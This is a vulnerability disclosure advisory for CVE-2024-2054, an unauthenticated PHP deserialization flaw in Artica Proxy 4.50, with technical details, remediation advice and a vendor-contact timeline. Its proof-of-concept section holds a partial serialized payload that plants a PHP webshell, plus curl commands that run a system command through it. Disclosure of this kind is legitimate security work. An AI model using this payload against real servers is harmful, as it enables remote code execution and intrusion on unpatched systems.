Title: Artica Proxy Unauthenticated PHP Deserialization Vulnerability
Advisory ID: KL-001-2024-002
Publication Date: 2024.03.05
Publication URL:

1. Vulnerability Details

      Affected Vendor: Artica
      Affected Product: Artica Proxy
      Affected Version: 4.50
      Platform: Debian 10 LTS
      CWE Classification: CWE-502 Deserialization of Untrusted Data
      CVE ID: CVE-2024-2054

2. Vulnerability Description

      The Artica Proxy administrative web application will deserialize
      arbitrary PHP objects supplied by unauthenticated users and
      subsequently enable code execution as the "www-data" user.

3. Technical Description

      Prior to authentication, a user can send an HTTP request
      to the "/wizard/wiz.wizard.progress.php" endpoint. This
      endpoint processes the "build-js" query parameter by base64
      decoding the provided value and then calling the "unserialize"
      PHP function with the decoded value as input.

      Code snippet from "wiz.wizard.progress.php":


      To exploit this vulnerability, a user can leverage the
      installed "Net_DNS2" library autoloader to instantiate the
      "Net_DNS2_Cache_File" class. The "__destruct" method
      within this class will write to arbitrary files defined
      by the class:

        public function __destruct()
            // if there's no cache file set, then there's nothing to do
            if (strlen($this->cache_file) == 0) {

            // open the file for reading/writing
            $fp = fopen($this->cache_file, 'a+');
            if ($fp !== false) {
            if (!is_null($data)) {

                // write the file contents
                fwrite($fp, $data);

      An unauthenticated user can overwrite existing files and
      insert a webshell to execute malicious PHP as the "www-data"

4. Mitigation and Remediation Recommendation

      No response from vendor. This vulnerability can be remediated
      by deleting the 'usr/share/artica-postfix/wizard' directory
      if it is not needed. Otherwise, move it to a location outside
      of the web root.

5. Credit

      This vulnerability was discovered by Jaggar Henry of KoreLogic,

6. Disclosure Timeline

      2023.12.18 - KoreLogic requests vulnerability contact and
                   secure communication method from Artica.
      2023.12.18 - Artica Support issues automated ticket #1703011342
                   promising follow-up from a human.
      2024.01.10 - KoreLogic again requests vulnerability contact and
                   secure communication method from Artica.
      2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from
          with response
                   "Client host rejected: Go Away!"
      2024.01.11 - KoreLogic requests vulnerability contact and
                   secure communication method via
          'Contact Us' web form.
      2024.01.23 - KoreLogic requests CVE from MITRE.
      2024.01.23 - MITRE issues automated ticket #1591692 promising
                   follow-up from a human.
      2024.02.01 - 30 business days have elapsed since KoreLogic
                   attempted to contact the vendor.
      2024.02.06 - KoreLogic requests update on CVE from MITRE.
      2024.02.15 - KoreLogic requests update on CVE from MITRE.
      2024.02.22 - KoreLogic reaches out to alternate CNA for
                   CVE identifiers.
      2024.02.26 - 45 business days have elapsed since KoreLogic
                   attempted to contact the vendor.
      2024.02.29 - Vulnerability details presented to AHA!
                   ( by proxy.
      2024.03.01 - AHA! issues CVE-2024-2054 to track this
      2024.03.05 - KoreLogic public disclosure.

7. Proof of Concept

      To overwrite the "wiz.upload.php" file to contain a PHP
      webshell, the following serialized object can be base64
      encoded and submitted via the "build-js" query parameter:

system($_GET['cmd']); ?>";a:2:{s:10:"cache_date";i:0;s:3:"ttl";i:9999999999;}}}

        $ ARTICA_URL=""; PAYLOAD_CMD="id"; curl -k 
&& curl -k "$ARTICA_URL/wizard/wiz.upload.php?cmd=$PAYLOAD_CMD";

      {"uid=33(www-data) gid=33(www-data) groups=33(www-data)

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KoreLogic, Inc. and are licensed under a Creative Commons
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